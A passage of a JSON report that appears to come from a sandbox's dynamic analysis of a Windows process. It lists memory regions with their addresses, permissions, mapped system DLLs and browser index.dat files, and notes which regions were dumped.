"readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_167", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 22806528, "type": "region", "version": 1 }, "end_va": 23855103, "entry_point": 0, "filename": null, "id": "region_995", "name": "private_0x00000000015c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 22806528, "timestamp": "00:00:58.989", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000996-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_168", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_996", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:00:58.989", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 102400, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 3969023, "entry_point": 0, "filename": null, "id": "region_997", "name": "pagefile_0x00000000003b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3866624, "timestamp": "00:00:58.991", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000998-addr_0x00000000016c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_169", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 23855104, "type": "region", "version": 1 }, "end_va": 24903679, "entry_point": 0, "filename": null, "id": "region_998", "name": "private_0x00000000016c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 23855104, "timestamp": "00:01:02.003", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000999-addr_0x00000000017c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_170", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 24903680, "type": "region", "version": 1 }, "end_va": 25952255, "entry_point": 0, "filename": null, "id": "region_999", "name": "private_0x00000000017c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 24903680, "timestamp": "00:01:02.003", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001000-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_171", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_1000", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:01:02.003", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001001-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_172", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_1001", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:01:02.004", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1961295872, "type": "region", "version": 1 }, "end_va": 1961385983, "entry_point": 1961307587, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_1002", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1961295872, "timestamp": "00:01:02.004", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 4112383, "entry_point": 3871373, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1003", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 3866624, "timestamp": "00:01:02.006", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1958871040, "type": "region", "version": 1 }, "end_va": 1959112703, "entry_point": 1958875789, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1008", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1958871040, "timestamp": "00:01:02.017", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001009-addr_0x00000000018c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_173", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 25952256, "type": "region", "version": 1 }, "end_va": 27000831, "entry_point": 0, "filename": null, "id": "region_1009", "name": "private_0x00000000018c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 25952256, "timestamp": "00:01:02.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1966342144, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1966346465, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1010", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1966342144, "timestamp": "00:01:02.020", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001011-addr_0x00000000003b0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_174", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_1011", "name": "private_0x00000000003b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3866624, "timestamp": "00:01:03.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3964927, "entry_point": 0, "filename": null, "id": "region_1012", "name": "pagefile_0x00000000003c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3932160, "timestamp": "00:01:03.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 3899391, "entry_point": 0, "filename": null, "id": "region_1013", "name": "pagefile_0x00000000003b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3866624, "timestamp": "00:01:03.004", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 3874815, "entry_point": 0, "filename": null, "id": "region_1068", "name": "pagefile_0x00000000003b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3866624, "timestamp": "00:01:03.054", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1948975104, "type": "region", "version": 1 }, "end_va": 1950670847, "entry_point": 1949165237, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_1069", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1948975104, "timestamp": "00:01:03.054", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3936255, "entry_point": 3932160, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_1070", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 3932160, "timestamp": "00:01:03.056", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4005887, "entry_point": 0, "filename": null, "id": "region_1071", "name": "pagefile_0x00000000003d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3997696, "timestamp": "00:01:03.057", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3997695, "entry_point": 3932160, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_1072", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 3932160, "timestamp": "00:01:03.065", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4095999, "entry_point": 4063232, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_1073", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 4063232, "timestamp": "00:01:03.067", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4194303, "entry_point": 4128768, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_1074", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 4128768, "timestamp": "00:01:03.068", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1954545664, "type": "region", "version": 1 }, "end_va": 1954680831, "entry_point": 1954550878, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_1075", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1954545664, "timestamp": "00:01:03.075", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 2000814080, "type": "region", "version": 1 }, "end_va": 2001096703, "entry_point": 2000818657, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_1076", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 2000814080, "timestamp": "00:01:03.077", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1989541888, "type": "region", "version": 1 }, "end_va": 1989758975, "entry_point": 1989547101, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_1077", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1989541888, "timestamp": "00:01:03.078", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 2000551936, "type": "region", "version": 1 }, "end_va": 2000576511, "entry_point": 2000557954, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_1078", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 2000551936, "timestamp": "00:01:03.079", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001079-addr_0x0000000000530000-size_0x0000000000070000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_175", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 458752, "start_va": 5439488, "type": "region", "version": 1 }, "end_va": 5898239, "entry_point": 0, "filename": null, "id": "region_1079", "name": "private_0x0000000000530000", "norm_filename": null, "region_type": "private_memory", "start_va": 5439488, "timestamp": "00:01:03.080", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 278528, "start_va": 1959788544, "type": "region", "version": 1 }, "end_va": 1960067071, "entry_point": 1959879673, "filename": "\\Windows\\System32\\dnsapi.dll", "id": "region_1080", "name": "dnsapi.dll", "norm_filename": "c:\\windows\\system32\\dnsapi.dll", "region_type": "memory_mapped_file", "start_va": 1959788544, "timestamp": "00:01:03.085", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001081-addr_0x00000000019c0000-size_0x00000000000b0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_176", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 720896, "start_va": 27000832, "type": "region", "version": 1 }, "end_va": 27721727, "entry_point": 0, "filename": null, "id": "region_1081", "name": "private_0x00000000019c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 27000832, "timestamp": "00:01:03.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1947140096, "type": "region", "version": 1 }, "end_va": 1947254783, "entry_point": 1947182129, "filename": "\\Windows\\System32\\IPHLPAPI.DLL", "id": "region_1082", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\system32\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1947140096, "timestamp": "00:01:03.088", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1947074560, "type": "region", "version": 1 }, "end_va": 1947103231, "entry_point": 1947079309, "filename": "\\Windows\\System32\\winnsi.dll", "id": "region_1083", "name": "winnsi.dll", "norm_filename": "c:\\windows\\system32\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1947074560, "timestamp": "00:01:03.090", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1971912704, "type": "region", "version": 1 }, "end_va": 1971924991, "entry_point": 1971912704, "filename": "\\Windows\\System32\\normaliz.dll", "id": "region_1084", "name": "normaliz.dll", "norm_filename": "c:\\windows\\system32\\normaliz.dll", "region_type": "memory_mapped_file", "start_va": 1971912704, "timestamp": "00:01:03.109", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 1925185536, "type": "region", "version": 1 }, "end_va": 1925521407, "entry_point": 1925190846, "filename": "\\Windows\\System32\\rasapi32.dll", "id": "region_1085", "name": "rasapi32.dll", "norm_filename": "c:\\windows\\system32\\rasapi32.dll", "region_type": "memory_mapped_file", "start_va": 1925185536, "timestamp": "00:01:03.112", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 1925054464, "type": "region", "version": 1 }, "end_va": 1925140479, "entry_point": 1925059294, "filename": "\\Windows\\System32\\rasman.dll", "id": "region_1086", "name": "rasman.dll", "norm_filename": "c:\\windows\\system32\\rasman.dll", "region_type": "memory_mapped_file", "start_va": 1925054464, "timestamp": "00:01:03.114", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1933246464, "type": "region", "version": 1 }, "end_va": 1933299711, "entry_point": 1933251366, "filename": "\\Windows\\System32\\rtutils.dll", "id": "region_1087", "name": "rtutils.dll", "norm_filename": "c:\\windows\\system32\\rtutils.dll", "region_type": "memory_mapped_file", "start_va": 1933246464, "timestamp": "00:01:03.115", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001088-addr_0x0000000000530000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_177", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 5439488, "type": "region", "version": 1 }, "end_va": 5443583, "entry_point": 0, "filename": null, "id": "region_1088", "name": "private_0x0000000000530000", "norm_filename": null, "region_type": "private_memory", "start_va": 5439488, "timestamp": "00:01:03.123", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001089-addr_0x0000000000560000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_178", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 5636096, "type": "region", "version": 1 }, "end_va": 5898239, "entry_point": 0, "filename": null, "id": "region_1089", "name": "private_0x0000000000560000", "norm_filename": null, "region_type": "private_memory", "start_va": 5636096, "timestamp": "00:01:03.124", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 5439488, "type": "region", "version": 1 }, "end_va": 5443583, "entry_point": 0, "filename": null, "id": "region_1090", "name": "pagefile_0x0000000000530000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5439488, "timestamp": "00:01:03.124", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001091-addr_0x0000000001a70000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_179", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 27721728, "type": "region", "version": 1 }, "end_va": 28770303, "entry_point": 0, "filename": null, "id": "region_1091", "name": "private_0x0000000001a70000", "norm_filename": null, "region_type": "private_memory", "start_va": 27721728, "timestamp": "00:01:03.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1912930304, "type": "region", "version": 1 }, "end_va": 1912954879, "entry_point": 1912930304, "filename": "\\Windows\\System32\\SensApi.dll", "id": "region_1092", "name": "sensapi.dll", "norm_filename": "c:\\windows\\system32\\sensapi.dll", "region_type": "memory_mapped_file", "start_va": 1912930304, "timestamp": "00:01:03.135", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001093-addr_0x000000007ffdb000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_180", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_1093", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:01:03.145", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1954480128, "type": "region", "version": 1 }, "end_va": 1954545663, "entry_point": 1954480128, "filename": "\\Windows\\System32\\nlaapi.dll", "id": "region_1094", "name": "nlaapi.dll", "norm_filename": "c:\\windows\\system32\\nlaapi.dll", "region_type": "memory_mapped_file", "start_va": 1954480128, "timestamp": "00:01:03.154", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001095-addr_0x0000000001b70000-size_0x00000000001e0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_181", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1966080, "start_va": 28770304, "type": "region", "version": 1 }, "end_va": 30736383, "entry_point": 0, "filename": null, "id": "region_1095", "name": "private_0x0000000001b70000", "norm_filename": null, "region_type": "private_memory", "start_va": 28770304, "timestamp": "00:01:03.165", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001096-addr_0x0000000001b70000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_182", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 28770304, "type": "region", "version": 1 }, "end_va": 29294591, "entry_point": 0, "filename": null, "id": "region_1096", "name": "private_0x0000000001b70000", "norm_filename": null, "region_type": "private_memory", "start_va": 28770304, "timestamp": "00:01:03.166", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001097-addr_0x0000000001d40000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_183", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30670848, "type": "region", "version": 1 }, "end_va": 30736383, "entry_point": 0, "filename": null, "id": "region_1097", "name": "private_0x0000000001d40000", "norm_filename": null, "region_type": "private_memory", "start_va": 30670848, "timestamp": "00:01:03.166", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001098-addr_0x0000000001d50000-size_0x0000000000200000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_184", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2097152, "start_va": 30736384, "type": "region", "version": 1 }, "end_va": 32833535, "entry_point": 0, "filename": null, "id": "region_1098", "name": "private_0x0000000001d50000", "norm_filename": null, "region_type": "private_memory", "start_va": 30736384, "timestamp": "00:01:03.167", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001099-addr_0x0000000001bf0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_185", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 29294592, "type": "region", "version": 1 }, "end_va": 30343167, "entry_point": 0, "filename": null, "id": "region_1099", "name": "private_0x0000000001bf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 29294592, "timestamp": "00:01:03.171", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001100-addr_0x000000007ffda000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_186", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147328000, "type": "region", "version": 1 }, "end_va": 2147332095, "entry_point": 0, "filename": null, "id": "region_1100", "name": "private_0x000000007ffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147328000, "timestamp": "00:01:03.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1870659584, "type": "region", "version": 1 }, "end_va": 1870684159, "entry_point": 1870664882, "filename": "\\Windows\\System32\\rasadhlp.dll", "id": "region_1101", "name": "rasadhlp.dll", "norm_filename": "c:\\windows\\system32\\rasadhlp.dll", "region_type": "memory_mapped_file", "start_va": 1870659584, "timestamp": "00:01:03.176", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001102-addr_0x0000000001d50000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_187", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 30736384, "type": "region", "version": 1 }, "end_va": 31784959, "entry_point": 0, "filename": null, "id": "region_1102", "name": "private_0x0000000001d50000", "norm_filename": null, "region_type": "private_memory", "start_va": 30736384, "timestamp": "00:01:03.181", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1935474688, "type": "region", "version": 1 }, "end_va": 1935540223, "entry_point": 1935474688, "filename": "\\Windows\\System32\\NapiNSP.dll", "id": "region_1103", "name": "napinsp.dll", "norm_filename": "c:\\windows\\system32\\napinsp.dll", "region_type": "memory_mapped_file", "start_va": 1935474688, "timestamp": "00:01:03.181", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001104-addr_0x000000007ffd9000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_188", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147323904, "type": "region", "version": 1 }, "end_va": 2147327999, "entry_point": 0, "filename": null, "id": "region_1104", "name": "private_0x000000007ffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147323904, "timestamp": "00:01:03.191", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1935343616, "type": "region", "version": 1 }, "end_va": 1935417343, "entry_point": 1935343616, "filename": "\\Windows\\System32\\pnrpnsp.dll", "id": "region_1105", "name": "pnrpnsp.dll", "norm_filename": "c:\\windows\\system32\\pnrpnsp.dll", "region_type": "memory_mapped_file", "start_va": 1935343616, "timestamp": "00:01:03.194", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 245760, "start_va": 1961033728, "type": "region", "version": 1 }, "end_va": 1961279487, "entry_point": 1961038941, "filename": "\\Windows\\System32\\mswsock.dll", "id": "region_1106", "name": "mswsock.dll", "norm_filename": "c:\\windows\\system32\\mswsock.dll", "region_type": "memory_mapped_file", "start_va": 1961033728, "timestamp": "00:01:03.204", 